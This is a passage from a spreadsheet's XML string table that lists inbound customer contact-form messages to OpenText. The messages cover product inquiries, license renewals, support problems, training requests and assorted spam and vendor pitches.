Product Name - Exceed Multi-platform for windows 1 year MAINTENANCE RENEWAL_x000D_
_x000D_
Request you to please provide us your valuable support._x000D_
_x000D_
Regards,_x000D_
Mayuri Tiwari_x000D_
Executive Business Support_x000D_
ACPL Systems Pvt Ltd</t>
  </si>
  <si>
    <t>Dear Sirs, I am writing to ask you the contact details of the person in charge for presentation and sale of Decisv Search for Europe-Italy. Kind regards, Chiara Micarelli</t>
  </si>
  <si>
    <t>Dear Sir/ Madam,_x000D_
 Please can you furnish me in full details about the standard of your_x000D_
products. I will appreciate it more if you can give me with detail_x000D_
specification or send me your product catalog. I am working as an_x000D_
accredited commission agent and I am looking for reliable companies_x000D_
Manufacturer/supplier whose products is of good quality as your_x000D_
products are among the need items which will be purchase in a large_x000D_
quantities here in Ghana by contract. send us your details_x000D_
specification and prices of your product or send us your catalog for_x000D_
our better understanding.This is an ongoing Tender You can reach me_x000D_
for business opportunities for the supply of your products if you are_x000D_
interested?_x000D_
Thank You Best Regards,_x000D_
Mr. edward kofi_x000D_
Consultant Agency_x000D_
Accra - Ghana</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
 _x000D_
ich hatte Frau Briana Lord (blord@opentext.com) eine E-Mail zu Rechnungsfragen geschickt und eine Fehlermeldung erhalten._x000D_
 _x000D_
Habe ich eine falsche E-Mailadresse? Ist Ihre Kollegin noch im Unternhemen tätig? Gibt es ggf. eine/n Nachfolger/in? _x000D_
 _x000D_
Herzlichen Dank!_x000D_
 _x000D_
Mit freundlichen Grüßen,_x000D_
Anne Leistner_x000D_
Business Suport_x000D_
</t>
  </si>
  <si>
    <t>Are you looking for a space/building for your possible business expansion in prime commercial area? We have a property along Shaw Boulevard which has a huge potential for your business.  We would appreciate if you could allow us to present this property to your company. Kindly contact me @ 0905-6873710 for any questions/concerns. Thanks!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Ron Aguilar_x000D_
Assistant Property Manager</t>
  </si>
  <si>
    <t>Like to know more about Documentum and its capability with regards to workflow implementation.</t>
  </si>
  <si>
    <t>I would like to open a ticket for the user-owned tableau TD2u device</t>
  </si>
  <si>
    <t>Our customer want to find OpenText Workflow Server .NET Edition (ver. 6.6 or higher), may I get the quotation? Thanks</t>
  </si>
  <si>
    <t>Invitation: Secure Programming - December 10-12,2018_x000D_
_x000D_
_x000D_
Course Overview_x000D_
_x000D_
This course allows students to learn basic and advanced concepts in developing and auditing programs that adhere to industry approved secure programming practices. Emphasis will be given to: understanding information security concepts, secure programming practices supported by OWASP (OWASP Top 10 Web Application Vulnerabilities), auditing techniques and tools, and common threats to applications and their mitigation strategies._x000D_
_x000D_
The course is also tailored to the audience/class participants based on their preferred platform (e.g. PHP, Java, .NET, etc.) so as to know how solutions for the OWASP Top 10 can be implemented._x000D_
_x000D_
_x000D_
What will you learn from this course_x000D_
_x000D_
1. Introduction to information_x000D_
Security_x000D_
2. Policy Frameworks_x000D_
3. Secure Coding Principles_x000D_
4. Web Services_x000D_
5. Threat Risk Modeling_x000D_
_x000D_
6. OWASP Top 10_x000D_
a. Injection_x000D_
b. Session Management_x000D_
c. Cross-site Scripting (XSS)_x000D_
d. Insecure Direct Ojbect References_x000D_
e. Security Configuration_x000D_
f. Sensitive Data Exposure_x000D_
g. Access Control_x000D_
h. Cross-site Request Forgery_x000D_
i. Components with Vulnerabilities_x000D_
j. Unvalidated Redirects/Forwards_x000D_
_x000D_
7. Best Practices_x000D_
a. Handling E-Commerce Payments_x000D_
b. Authentication_x000D_
c. Authorization_x000D_
d. Data Validation_x000D_
e. Canoncalization, Locale and Unicode_x000D_
f. Error handling, Auditing and Logging_x000D_
g. File System_x000D_
h. Administrative Interfaces_x000D_
i. Cryptography_x000D_
j. Maintenance_x000D_
_x000D_
8. Other Threats_x000D_
a. Phishing_x000D_
b. Buffer Overflows_x000D_
c. Denial of Service Attack_x000D_
_x000D_
_x000D_
Investment Fee:_x000D_
_x000D_
Group Rate: P 18,528 + VAT/pax (Promo valid if you register 5 or more participants in the training)_x000D_
Special Rate: P19,455 + VAT/pax (Promo valid if you register 3 participants in the training)_x000D_
Regular Rate: P21,400 + VAT/pax_x000D_
_x000D_
Venue:_x000D_
Unit 1806,Tycoon Center,Pearl Drive St. Brgy. San Antonio,Ortigas,Pasig (Near Tektite,PSE)_x000D_
_x000D_
Duration:_x000D_
3 Days_x000D_
_x000D_
Your course tuition entitles you to:_x000D_
_x000D_
_x000D_
* Lunch, morning and afternoon snacks _x000D_
*</t>
  </si>
  <si>
    <t>Hi!_x000D_
We are planning to purchase "Encase Forensic v8 perpetual license", but doubt if you can deliver it to Kazakhstani company?</t>
  </si>
  <si>
    <t>Business needs</t>
  </si>
  <si>
    <t>We would like to ask if you are open for distribution partnership here in the Philippines. We are a Value-Added-Distributor (VAD). Currently we are looking for an EDR solution to integrate with our Lastline solution (NAPT, sandboxing, web, email).</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I received a "Cards Against Lawyering" game as a gift a couple years ago. It has been a delightful addition to my board game collection. The company listed on the game is one called "Recommind,"which led me to your website. It's been a riot to play it with my fellow lawyer friends. I would love to purchase some more copies of this game if they are available. Could you please direct me to whom I should contact about purchasing more copies of "Cards Against Lawyering?" Thank you!! </t>
  </si>
  <si>
    <t>We had an old LiveLink 9.7 profile which was never configured when we upgraded to Open Text Archive Server 10.0 (will be upgrading to 16.0 next year). I would like to know if we have all the profile settings, can we create a new profile in Open Text? Our users want to use a third party application to manage multiple scanned documents into SAP Maintenance Work Orders and I want them to continue using Open Text. Our process is to scan in multiple SAP work orders and attach them to the work orders in SAP Plant Maintenance.</t>
  </si>
  <si>
    <t>WANT DEMO AND TRAIL SUBSCRIPTION SO THAT WE CAN EVALUATE IT FOR OUR BUSINESS PURPOSE.</t>
  </si>
  <si>
    <t>looking for trusted link developer as400 training</t>
  </si>
  <si>
    <t>I am interested in the Captiva Cloud Toolkit - Where can i find the announced Trial Download and where can i find more informations About licensing?_x000D_
_x000D_
Thanx in Advance,_x000D_
_x000D_
Martin Hüllwegen</t>
  </si>
  <si>
    <t>Product registration. Where can i register encase dongle?</t>
  </si>
  <si>
    <t>Здравствуйте. _x000D_
Я комерческий писатель, автор книги: _x000D_
- Тексты для бизнеса, рекламы, сайта. Способы продвижения в соц сети _x000D_
 _x000D_
Ищу проекты на ведение страниц/групп в соцсетях _x000D_
Вы можете сделать свой бренд, продукцию более узнаваемой с помощью, социальных сетей. _x000D_
Сформирую нужный имидж у ЦА. _x000D_
Что умею: _x000D_
- составлять интересные контент-планы _x000D_
- модерировать сообщества _x000D_
- работать с негативом _x000D_
- создавать красивый и стильный дизайн для постов _x000D_
В предложение (ведение страниц) входит; _x000D_
- оформление ваших страниц, _x000D_
- интересные публикации для вовлечения вашей ЦА, _x000D_
- рекламные и продающие тексты, направленные на реализацию коммерческих целей, _x000D_
- ответы клиентам и работа с негативом генерирование имиджевого контента. _x000D_
 _x000D_
За работу прошу всего 13 000р.  в месяц – 30 постов в месяц по 1 500 символов каждый. _x000D_
 _x000D_
Также могу: _x000D_
- написать новости, статьи и анонсы _x000D_
- составить продающие email-рассылки _x000D_
- сео тексты с описанием услуг/товаров для сайта _x000D_
 _x000D_
Спасибо, что прочли мое сообщение. _x000D_
Добра Вам. _x000D_
 _x000D_
webwriterspb@gmail.com _x000D_
 _x000D_
С уважением  веб райтер</t>
  </si>
  <si>
    <t>youtube</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
Alloy is a supply chain synchronization platform (similar to an ERP). A number of our customers are also customers of OpenText, and we are wondering what the optimal way to integrate with OpenTextwould be to consume our customers EDI data. Do you have any resources available for business system providers looking to integrate with OpenText?_x000D_
_x000D_
Thanks!_x000D_
Evan</t>
  </si>
  <si>
    <t>BT</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I sent you an email asking you to get the latest version because there was an instance software usb. Tell me how to find the serial number and ask for the serial number. However, it does not enter the site you informed me about._x000D_
I'm sorry, but please tell me how to download the encase..._x000D_
_x000D_
Here's the link to finding the serial number you've given me in OpenText.  But there is no access._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have a legacy application built on Team Developer 3.0.  We are facing an issue when trying to use the TLS 1.2 enabled SQL Server.  I would like to discuss options to find best possible solutions._x000D_
_x000D_
Thanks_x000D_
_x000D_
Muthu</t>
  </si>
  <si>
    <t>I have 3 encase 6 dongles from when I was known as ESI Production Inc. Is there an upgrade path available?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to know if my maintenance contract for EnCase is up to date.</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(921)995-64-28, Александр.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText!_x000D_
_x000D_
My name is Peter Holmes, I'm an MBET (Masters of Business, Entrepreneurship and Technology) student from the University of Waterloo.  _x000D_
_x000D_
For our class,  I'm evaluating the Machine Learning industry, specifically how the benefits of predictive analytics could bring insights to industries that produce a lot of data but don't know how to best utilize it. Our professor recommended that we reach our to OpenText and after doing some research I can see why! I would definitely appreciate your insights on this topic._x000D_
_x000D_
Would you be willing to have a short 10-15 minute conversation to discuss your experiences and talk about this? </t>
  </si>
  <si>
    <t xml:space="preserve">I attended ARMALive 2018 but unfortunately did not connect with you at your booth. I would like to chat about auto-classification. </t>
  </si>
  <si>
    <t>RFI on OCR service and Data Capture Service to launch on Monday, the 26th of october. Would like to involve Opentext in it. Sorry for short notice._x000D_
_x000D_
BR</t>
  </si>
  <si>
    <t>I will WRITE or edit 500-1000 words of copy for your business. Short Sales Page, Ad, web copy, etc. 100$</t>
  </si>
  <si>
    <t xml:space="preserve">Jobs </t>
  </si>
  <si>
    <t>dongle G2002323830, tiene una expiración del 14 de octubre de 2021, estamos intentando abrir un ticket el cual nos envía a una pagina de confirmación por correo, una vez confirmamos nos aparece una pagina de no acceso lñuego que confirmamos, requerimos actualizar las licencias de nuestros productos aquiridos, esperamos su pronta respuesta.</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
i am using gulta report builder 7.0; update 1 Build 50852._x000D_
the input totals is not working, when i select a formula to sum; it disappears and i'm unable to add totals in any of my reports._x000D_
the sum() function returns err_func._x000D_
please advise, thank you _x000D_
</t>
  </si>
  <si>
    <t>Hello. Please advise how I can make payment for my coworker to attend Encase training as I've been unable to reach anyone via phone at 1-800-499-6544.</t>
  </si>
  <si>
    <t xml:space="preserve">HI_x000D_
Please share the renewal quote for below. Customer: Cognizant Technology solutions _x000D_
Exceed  qty: 18. Lice: Lic.# V1044-60000_x000D_
</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
Through this, I Ezekiel Joshua C. Bernal, from senior cycle in the career of Computer Science at the University of Far Eastern University make my respective presentation to you in order to do my internship in your prestigious company._x000D_
_x000D_
As you know an important part of my university in conducting internships in companies related to the field of study in which we test our knowledge and develop the skills needed to develop ourselves at a professional level with efficiency and effectiveness._x000D_
_x000D_
Therefore, finding myself in the last cycle of my career, I am looking for a company in which to develop my practice, and as you know, develop a graduation project to be supervised and approved by a panel of professionals in my university._x000D_
_x000D_
Thank you very much for the attention you can give to this request and I hope to have the opportunity to do my internship at a renowned company like yours. For my part I will put all of me, my dedication and my best._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ezekiel Joshua C. Bernal_x000D_
Student from Senior Cycle of Computer Science_x000D_
Far Eastern University</t>
  </si>
  <si>
    <t>I need the licence updated for my company. we are INFORM customers and use streamserver 5.6.2 but in our licence file missing the execute and tq _x000D_
_x000D_
please can you answer me _x000D_
thanks a lot_x000D_
Bye_x000D_
Samantha Trocino</t>
  </si>
  <si>
    <t>Update on my request 19/11/2018</t>
  </si>
  <si>
    <t>Unclaimed benefits</t>
  </si>
  <si>
    <t>Hi, recently I did see a presentation about a customer using OpenText Teleform to scan receipts, with physical scanners. Are you offering the same kind of process (scan, OCR, validation software, ...) but by scanning receipts from a smartphone or tablet with an app ?_x000D_
Thanks in advance for you answer._x000D_
Kind regards_x000D_
Pascal Maradan</t>
  </si>
  <si>
    <t xml:space="preserve">Open Text, I recently received a purchase order  for $1,795.00 for the OnDemand  training of Navigating EnCase Version 8. Im wondering who I send it to to get access to the class? My email is Mconway@watertownctpd.org. Thanks Mark. </t>
  </si>
  <si>
    <t xml:space="preserve">Am trying to order the white paper "Best Practices in ECM Migration".  I can't do this because the form gives me an error message asking for my Industry category, but there is no such thing on the form so I have no place to put the data the validation is looking for.  Would still like the paper._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need OEM-licenses for the product Eceed 15 for our customer. Our customer Siemens want to build a product there your SW is included and sell it to their customer.  The demand is very small &lt;10 pcs. Do you offer OEM-Licenses that can be sold?</t>
  </si>
  <si>
    <t>We are working to identify a Document Management solution that can integrate with SAP, but also non-SAP applications, I appreciate a contact before the end of the month</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am currently gathering information on your RightFax solutions for one of my client's project. I have a question concerning virtualization: there are some virtualization requirements as well as the hybrid solution RightFax Connect using the OpenText cloud._x000D_
_x000D_
Is it possible to use RightFax virtually (e.g RightFax 16 Enhancement Pack 2) without any of the cloud features?_x000D_
_x000D_
Thank you for your time and I will be expeting your answer. :)_x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>EnCase Endpoint Investigator X100008116124 license renewal, support contact re-establishment after colleague Germain Geissler left the company.</t>
  </si>
  <si>
    <t>I would like to speak to someone about opentext cloud business network for fax and telex solutions</t>
  </si>
  <si>
    <t>Enquiry about Exstream</t>
  </si>
  <si>
    <t>I am planning to buy a tempobox license to my team. Our 3rd party team shared a folder with us in their account. Is there a way , where we can sync our folder with their folder?_x000D_
Could you please support me on this matter?</t>
  </si>
  <si>
    <t>SAP B1- interested in a potential partnership for DM, ECM for some live opportunities. Do you products work with SAP B1 as standard?</t>
  </si>
  <si>
    <t>We want to know more about DMS solution. Request your local bangalore support team to contact us for discussion</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-- _x000D_
Hi,_x000D_
_x000D_
I want to keep this email short and to the point, I stumbled upon your web site and noticed a _x000D_
_x000D_
few items that are almost certainly hurting your ability to rank well with Google. If you are _x000D_
_x000D_
open to making some adjustments I really think you can dramatically improve your Google_x000D_
_x000D_
 ranking, and the overall effectiveness of your web site. I'd like to do a no obligation analysis _x000D_
_x000D_
on your site that I know you will find very interesting and very helpful in terms of your_x000D_
_x000D_
 Google ranking._x000D_
_x000D_
Can I give you a call without any obligation Or, I really think I can get you guaranteed revenue_x000D_
_x000D_
We can held a meeting and discus about it. Should i call to fix appointment for the meeting ?_x000D_
_x000D_
.I look forward to hearing from you._x000D_
_x000D_
Note: - Please ignore if you are not interested_x000D_
_x000D_
Kind regards, _x000D_
_x000D_
David Willson / david.willson9711@gmail.com_x000D_
</t>
  </si>
  <si>
    <t>Qqwed</t>
  </si>
  <si>
    <t>Renewal of resellership for eDOCS solution...</t>
  </si>
  <si>
    <t>looking to talk to someone about implementing a company wide document storage solution with automated data classification &amp; indexing, for archived/historical analog data and digital data moving forward.</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8 (965)786-78-78,  Дмитрий.</t>
  </si>
  <si>
    <t>We currently have OpenText Enterprise Connect Framework 10.5.1 on our computers. We would like to know if using a plugin or a new version can integrate IE or Adobe Acrobat with Livelink. Thank you.</t>
  </si>
  <si>
    <t>Just wondering if I need to take the online training, or is there any option for the SAP IM (VIM) bootcamp of 5 days in Hoofddorp Netherlands in December? I know I did see this option before. Is it fully booked or can I be added?</t>
  </si>
  <si>
    <t>We are interested in your ECM solution and would like to have a demo done of the full function of the solution. Please contact me at the email address outlined or call me at the number provided.  We could do a video conference or webinar  to see demo please date a date convenient so we can confirm our availability.   We are located in Jamaica, Kingston.</t>
  </si>
  <si>
    <t>Question: I am thinking of acquiring at least one Brava license, but the only function that I need is "compare" between 2 ".tiff" drawings. Which is the cheapest Brava version that contains this function?</t>
  </si>
  <si>
    <t xml:space="preserve">I am contacting you from the Canadian Medical Protective Association, which is is a not-for-profit mutual defence association representing Canadian physicians. We are currently in the process of looking for a single survey solution that our entire organization can use. _x000D_
_x000D_
We have conducted a security assessment of vendors that appeared in Gartner’s Market Guide for Voice of the Customer Solutions and are now looking for further information from vendors that met our security requirements for a cloud solution (e.g. Canadian data residency). _x000D_
_x000D_
At this point, we have defined requirements from a survey perspective and are really looking for a survey tool but are open to seeing some broader functionality offered by your product as well. _x000D_
_x000D_
Please contact me for any further information that you may require (requirements etc…)_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Sean_x000D_
</t>
  </si>
  <si>
    <t>Please can you advise if you7 have a UK supply chain or distributor that we can buy from</t>
  </si>
  <si>
    <t>OpenText™ Production Messaging_x000D_
_x000D_
need info</t>
  </si>
  <si>
    <t>please connect my account to unisys as partner. as I am a consultant for unisys worldwide</t>
  </si>
  <si>
    <t>apply for the function of test manager in Brussels, found on linkedin jobs</t>
  </si>
  <si>
    <t xml:space="preserve">I am SAP Basis Admin at Royal Unibrew and do upgrades. We are upgrading VIM and Archive Link Server - I am not able to download software for Archive Link Server, get following error all the time:_x000D_
_x000D_
Content Server Error:  _x000D_
[Sorry, no exact match was found for an item with the Nickname "14162727". Either it does not exist or you do not have permission to access it. If you were sent a link to this item, please contact the sender for assistance.]_x000D_
</t>
  </si>
  <si>
    <t>3rd standard</t>
  </si>
  <si>
    <t>ACWA Power is looking for an ECM solution</t>
  </si>
  <si>
    <t>My Boss purchased Brava reader from you and its not allowing me to input the licence details into the software.</t>
  </si>
  <si>
    <t>Hi, I am studying A Levels at UTC in Reading and looking at options after my exams.  I would like to join a sponsored degree programme in Cyber Security and would like to know whether this is a programme that Opentext are involved in.  I look forward to hearing from you</t>
  </si>
  <si>
    <t>Hi!_x000D_
We need to buy a Tableau hardware in Russia. Can we do it? Is this hardware are selling and supporting in Russia?_x000D_
Thank for answer via email.</t>
  </si>
  <si>
    <t>I am trying to get access to "My Support". Please help.</t>
  </si>
  <si>
    <t>Bonjour, nous sommes à la recherche de solutions de dématérialisation de workflow et de documentation.</t>
  </si>
  <si>
    <t>Please could you provide further information regarding the OpenText Content Server product and other document management options._x000D_
_x000D_
Regards, Hugh</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in integration of the Brava Enterprise with our document management system. Request you to please get intouch with me as soon as possible. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have a client that uses rightFax, can you tell me what version of this software is supported on Windows 10? They have version 9.4_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
Nice to work with Right Fax._x000D_
_x000D_
I am facing issue to forward one fax to another fax user programmatically (using C#)._x000D_
Can you please some tutorial/code snippet to achieve this?_x000D_
_x000D_
Quick response is highly appreciated._x000D_
_x000D_
Regards,_x000D_
Ratnesh</t>
  </si>
  <si>
    <t>Hi, we are a mid-size lawfirm in HK with around 100 staff. We are looking for upgrading our system with the support of a document management system that comes with DMS &amp; ECM. Could you revert to me a quotation with cost of software and hardware ?Thank you</t>
  </si>
  <si>
    <t>Hi Open Text,_x000D_
_x000D_
I am from IBM and we are interested in getting training directly from Open Text.  Can you please let me know who I can reach out to?  Or can you send me a quote for the Open Text training?  Thanks!</t>
  </si>
  <si>
    <t>Would it be possible to get a contact name, job title and email address of someone from the company based in the Singapore office? We have a business opportunity in partnership with IMDA to potentially explore with you!</t>
  </si>
  <si>
    <t>询价</t>
  </si>
  <si>
    <t>Inquiring about cost and screen shot examples of this product . We have started a project where 'integration is required between SharePoint 2016 and EDocs. We need to study the features in order to evaluate our options._x000D_
_x000D_
Regards Justin</t>
  </si>
  <si>
    <t>Inquiry if support will be provided should we re-instate a decomissined MessageManager Server</t>
  </si>
  <si>
    <t>Recently purchased EnCase license dongle but have not been given access to download portal. Dongle ID G3002089217.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam._x000D_
_x000D_
I hope you are having a great week? This is Adam from Aspire Tech, based on New York City, USA. We are working with one of our international client in Bangladesh on a project where my client is looking one of EnCase Endpoint Investigator solution._x000D_
_x000D_
Aspire Tech is going to attend few Forensic tenders for CID (Criminal Investigation Department) in Bangladesh where I believe we can work together._x000D_
_x000D_
Client Name: CID (Criminal Investigation Department)_x000D_
Address: CID, Headquarters, Malibagh, Dhaka._x000D_
Telephone: 9333264_x000D_
Fax No.: 9333329_x000D_
_x000D_
Thanks_x000D_
Adam Tanjil_x000D_
Aspire Tech Services and Solutions_x000D_
380 Lexington Ave_x000D_
New York, NY-10168_x000D_
Cell:  +1.917-600-9233_x000D_
Email: tanjil@aspiretss.com_x000D_
Skype: aspiretss _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wir sind auf der Suche nach einer Software-Lösung, die große Datenbestände / digitale Dokumente gezielt durchsuchen kann</t>
  </si>
  <si>
    <t>Please contact me about the below._x000D_
1. when can we expect a First Class client for the newest Mac OS that will allow copy/paste image into messages as before?_x000D_
2. Can you confirm that First Class will be supported or is there an End of Life coming? I ask because we have been a first class school district for 20 plus years but recently have a change in administration that questions our use of a legacy software_x000D_
3. We currently are hosted by Kannon in Maine. Our hosted server is still at Version 12. Is this to be expected? Are there other features or an updated interface with a new version? _x000D_
Thank you for your speedy reply_x000D_
Laura Maroon</t>
  </si>
  <si>
    <t>Hello,_x000D_
We're looking for a good ICR/OCR recognition service/app. For our project, we're expecting to process about 1.000 pages per minute, 30.000 pages per hour, and the complete process it's about 200.000 pages. The process would take about 7 hours and it's meant to be done in one day. The dates and the number of pages can vary from month to month. There's an unexpected number of processes and the preparation time for the process may vary as well between 30 or less days._x000D_
Please answer the questions if interested:_x000D_
-Which image format and resolution do you require to perform ICR / OCR recognition?_x000D_
-Can you guarantee a recognition percentange for the process?_x000D_
-What kind of support can you provide for our process? email, telephone, etc ? prices, schedules ?_x000D_
-Can you provide me with a list of prices accord to the information I provided? for both API service and Recognition Application._x000D_
-Do you offer training/capacitations to use your service/app?_x000D_
-Can you state your recognition times per page or field?_x000D_
-Does the software provide edition tools for the response generated? (In the case of the recognition was not accurate enough?) What kind of tools do you have? Is there any video or tutorial showing it ?_x000D_
-Does the API service or the application have a petition/recognition limit per second/minute? In order to achieve our recognition goal we're using threads._x000D_
-What kind of infrastructure your solution requires?_x000D_
-About your tool ... How was it developed, is it possible to scalate it, to impove it or modify?_x000D_
I'm working against a deadline....a quick answer would be appreciated._x000D_
Thank you for your time,_x000D_
Greetings</t>
  </si>
  <si>
    <t>Do you still support or have anyone with knowledge on Gupta SQLBase 11.6?</t>
  </si>
  <si>
    <t>Need Quote</t>
  </si>
  <si>
    <t xml:space="preserve">We no longer need our VPN service:_x000D_
Customer No. 105514_x000D_
Contract No. 40009064 _x000D_
$199.00 per month_x000D_
_x000D_
I can't get anyone on the sales or accounting phones and tech support gave me sales_anx@opentext.com to cancel the service and that address bounces back. </t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a Demo of your CMS Product:_x000D_
Ace Hardware Corporation is interested in replacing its current SharePoint CMS tool. We are interested to see what opentext could do for Ace when it comes to managing / creating content for our Ace Retailers. Below are some of the top things we are interested in when it comes to a CMS:_x000D_
1.	Customizable workflow that follow current communication processes_x000D_
•	Includes automated messaging to requester to let them know request is received, scheduled and completed._x000D_
•	Automatically alerts content owners when their content needs to be reviewed._x000D_
•	User experience should be intuitive enough that people from across the business can use. Future state for us includes business partners uploading their own content via this CMS._x000D_
2.	Two-way communication/social feed options_x000D_
•	User friendly way for all levels of business (from officer to store associate) to communicate. Examples: Comments, improved community section, profiles_x000D_
3.	Customizable templates – more flexibility in page/article layouts_x000D_
•	Video player with external linking options supporting all video types_x000D_
•	Enhanced photo options with galleries – Light box_x000D_
•	Enhanced homepage design - with customizable news feed &amp; user dashboard_x000D_
4.	Segmentation_x000D_
•	Allows for targeted content by various types (location, ad region, position in store, programs the retailer is signed up for, etc.)_x000D_
5.	Flexible navigation_x000D_
•	Ability to customize left nav/menu ordering_x000D_
•	Customizable landing pages_x000D_
•	Ability to link to external sources from navigation_x000D_
6.	Personalization_x000D_
•	Gives user ability to choose what types of content they want to see on homepage_x000D_
•	Allows for use of trending content_x000D_
7.	Standard CMS automation_x000D_
•	Automate dates, content expiration, etc._x000D_
8.	Carousel manipulation_x000D_
•	Allow Communications team to easily manipulate the content within the carousel_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wondering who I can get in touch with regarding an unpaid invoice sent to VendorInvoicesNA@opentext.com</t>
  </si>
  <si>
    <t>CMS product interest</t>
  </si>
  <si>
    <t>We are looking for a records management solution. Would you be able to assist?</t>
  </si>
  <si>
    <t>Interested in a quick demo/pricing for DLA-compliant EDI solution.</t>
  </si>
  <si>
    <t>The City is a current customer and we are running Alchemy Search Release 9.0. I would like to speak to someone about our current use case and see what version/product might be a better fit for us. _x000D_
Thanks_x000D_
Erik</t>
  </si>
  <si>
    <t>Looking forward to know WEM roadmap and Team Site features.</t>
  </si>
  <si>
    <t xml:space="preserve">Because of your lack of interest in contacting us back (Two weeks with multiple phone and website contacts) we can no longer await for a response for renewals for our licenses and we will be switching our 3 EnCase Forensic Software licenses over to Access Data FTK after 18 years of using your product. I feel it is highly unprofessional to make customers wait over two weeks and multiple attempts to contact you have gone unanswered. I can say I have never experienced such sad sales practices. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText-Team,_x000D_
_x000D_
in the context of a computer science university module "software-project", we (students of the Freie Universität Berlin) are conducting a market-analysis of reporting frameworks. In the setup we are given, we evaluate software for a client, who wants to integrate this reporting software into their own platform. While researching the field we stumbled upon "OpenText Analytics Designer" as a kind of successor to BIRT. Some answers we require could not be found on the website. This is why we ask over this formula:_x000D_
* What is the licensing model for the "Analytics Designer"? _x000D_
* Would it be possible to use "Analytics Designer" as a part of an OpenText external platform? Would you say this is a sensible plan?_x000D_
* If so, what would be your pricing model?_x000D_
* Is there a planed release cycle for the "Analytics Designer"? If so, what are the intervals?_x000D_
_x000D_
Thank you and kind regards_x000D_
Manuel Leppert  </t>
  </si>
  <si>
    <t>We are looking for 3-8201 Captiva 7.6 Fundamentals and Administration training (for 2-3 resources).  We are currently located in Geneva, Switzerland and our pre-requisite would be Trainer should be comfortable in speaking and understanding ENGLISH._x000D_
_x000D_
Kindly let us know the details of various training models (Virtual/On-line and Classroom), Price details, its pre-requisites, and the best option that you would suggest based on our location._x000D_
_x000D_
Please note that we need to start this training at the earliest possible._x000D_
_x000D_
Also, can you please let us know possibility of providing us training on Captiva 6.5 SP2 for 1. Fundamentals and Administration 2. Developer and 3. Dispatcher.</t>
  </si>
  <si>
    <t>Hi, please advise how I can check the OpenText certification status of support staff employed by OpenText resellers, similar to Microsoft , ITIL etc.  Thank you</t>
  </si>
  <si>
    <t>i have mcent coines</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
wir sind interessiert and ihrer Documentum Produktfamilie, um unser derzeitiges DMS System abzulösen._x000D_
Ich bitte um eine Kontaktaufnahme._x000D_
Mit freundlichen Grüßen_x000D_
Michael Baumgartner </t>
  </si>
  <si>
    <t>After that i confirm the registration i still not able to get in my support, i need to download Teleform 16.3 and 16.5  thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We are former Gupta partner with customer installed base. I need to reach out a Gupta account sales representative </t>
  </si>
  <si>
    <t xml:space="preserve">Hi! I'm the archivist for a small military history museum in Quebec City and I'm looking to find a new database system for the description and management of our archives, library and collections. Can you give me some general information about the specs required for your system (we use MAC) and ballpark figure for your prices?_x000D_
_x000D_
Thank you! </t>
  </si>
  <si>
    <t>We bought an Open Text licence through our partner SAP and we need a secure access key to install some add ons from Open Text but currently SAP is not able to provide us those passwords._x000D_
_x000D_
I would be very greatefull if you could provide them._x000D_
_x000D_
Thank you very much._x000D_
_x000D_
Alex</t>
  </si>
  <si>
    <t>Trying to get a ROM cost for the upgrade of Streamserve 5.6.2 to the latest version.</t>
  </si>
  <si>
    <t>We need a copy of your W-8 or US W-9 tax form.</t>
  </si>
  <si>
    <t>Trying to renew our Academic Licenses for Encase renewal. Can't get hold of my representative we had last year and the year before. No response back from either. Our Academic license, we have, is expiring in December. We are at Texas State Technical College in Waco Texas._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Derek Smith_x000D_
TSTC Waco Cyber Security_x000D_
dpsmith@tstc.edu_x000D_
254-867-3204  work</t>
  </si>
  <si>
    <t>Can someone arrange to contact me to discuss your product offering?_x000D_
We're a small company developing medical devices and are looking for a product to manage documentation, aid with collaboration on documents, manage reviewing and approvals, manage version control, enable secure storage and assist in locating information. At present we use multiple packages to achieve this, with the resulting opportunities for error and inefficiencies. _x000D_
We have an office, but are often not co-located, with the team often working from home and with suppliers across Europe._x000D_
At this stage we are scoping possible solutions, with a view to implementation in the longer term. _x000D_
I look forward to hearing from someone._x000D_
Helen</t>
  </si>
  <si>
    <t>Trying to sign in and it returns a message saying our account, Garland Sales, has been deactivated. We need to reactivate as we have GXS customers looking to pull our information from the catalog.</t>
  </si>
  <si>
    <t>Hello, I have a license for Trusted Link and would like to move it to another machine as the employee moved to a different one._x000D_
_x000D_
Can someone assist me in doing this?</t>
  </si>
  <si>
    <t>Need quote for 2 Hummingbird Exceed for Windows 10 Licenses.</t>
  </si>
  <si>
    <t>I have 2 staff interested in On Demand.  One staff person will be taking it again and the other is new. Can we purchase 2 licenses for same subscription?</t>
  </si>
  <si>
    <t>VVV内容物vvv</t>
  </si>
  <si>
    <t>Dear Documentum Team,_x000D_
_x000D_
We are looking for a tool, that can fulfill our requirments._x000D_
_x000D_
